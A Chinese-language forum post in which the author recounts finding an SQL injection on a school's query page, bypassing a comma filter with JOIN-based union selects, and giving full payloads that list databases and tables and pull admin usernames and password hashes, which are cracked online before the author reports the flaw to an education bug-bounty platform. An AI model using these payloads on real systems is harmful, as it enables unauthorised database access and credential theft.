联系我们联系我们
电子邮箱电子邮箱

记一次edu漏洞挖掘

[复制链接]

该用户从未签到

zmumu 发表于 2021-1-21 19:25:30
113 0
本帖最后由 zmumu 于 2021-1-21 19:40 编辑


在某学校发现查询的功能页面
11.png
在url处加入单引号引发报错

(9V6SESEOCB44~2M8](J`}H.png
前面 是常规注入order by测试字段数为13个
但是测试回显点的时候发现逗号被过滤了
22.png
这时候就可以使用jion注入
union select 1,2,3用jion语句表示为
union select from (select 1)a jion (select 2)b jion (select 3)c
执行的结果是一样的
这里的语句是:
' union select * from (select 1)A join (select 2)B join (select 3)C join (select 4)D join (select 5)E join (select 6)F join (select 7)G join (select 8)H join (select 9)I join (select 10)J join (select 11)K join (select 12)L join (select 13)M#

图片 4.png
测试出回显点为3

然后查询数据库版本和用户
payload:
' union select * from (select 1)A join (select 2)B join (select version())C join (select 4)D join (select 5)E join (select 6)F join (select 7)G join (select 8)H join (select 9)I join (select 10)J join (select 11)K join (select 12)L join (select 13)M#
图片 3.png

查询数据库也出现了状况
database()不可以使用
33.png

呢我们直接查询所有数据库
sql语句里查询所有数据库的语句是:
select group_concat(schema_name) from information_schema.schemata


图片 16.png
数据库有60多个....
通过报错得知当前数据库的名称为2zweb
直接查询表
payload:
' union select * from (select 1)A join (select 2)B join (select group_concat(table_name) from information_schema.tables where table_schema='2zweb')C join (select 4)D join (select 5)E join (select 6)F join (select 7)G join (select 8)H join (select 9)I join (select 10)J join (select 11)K join (select 12)L join (select 13)M#
44.png
有点多久不一一展示了

然后就是顺利的查字段和内容了
在admin表下查到usernmae和password内容
55.png

在线解密一下就出来了
下载.png

然后就是提交EDU漏洞平台了



11.png
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

发表新帖